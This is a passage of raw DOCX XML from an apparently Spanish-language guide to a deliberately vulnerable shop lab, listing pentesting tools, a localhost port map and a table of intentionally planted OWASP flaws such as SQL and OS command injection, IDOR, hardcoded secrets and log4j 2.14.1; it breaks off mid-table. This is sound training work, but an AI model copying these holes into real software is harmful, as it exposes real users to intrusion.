                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Pentesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap, curl / Invoke-RestMethod, OWASP Dependency-Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Herramientas de explotación y análisis de dependencias</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapa de puertos del laboratorio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1800"/>
        <w:gridCol w:w="4450"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Puerto host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="445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Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">frontend (nginx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4450"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sitio web de la tienda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">backend (Spring Boot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4450"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">API REST + Actuator (expuesto a propósito en v1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">postgres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4450"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Base de datos (accesible también desde el host para inspección)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidades implementadas (resumen v1)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5150"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="115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OWASP 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Categoría</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="515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Implementación en el código</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Registro público con role=ADMIN; panel admin sin verificar rol; IDOR en /api/pedidos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Actuator expuesto sin auth, CORS "*", credenciales hardcodeadas, debug=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>log4j-core 2.14.1 incluido como dependencia vulnerable conocida para análisis SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Contraseñas en texto plano en BD; secreto JWT débil y hardcodeado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection en /api/productos/buscar y /api/productos/{id}; OS Command Injection en /api/admin/reportes/ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Carrito sin validar stock ni cantidad; cartId predecible sin ligar a sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin rate-limit ni bloqueo de cuenta; JWT sin expiración real; credenciales logueadas en consola</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Subida de archivos sin validar tipo/extensión; path traversal en el nombre de archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
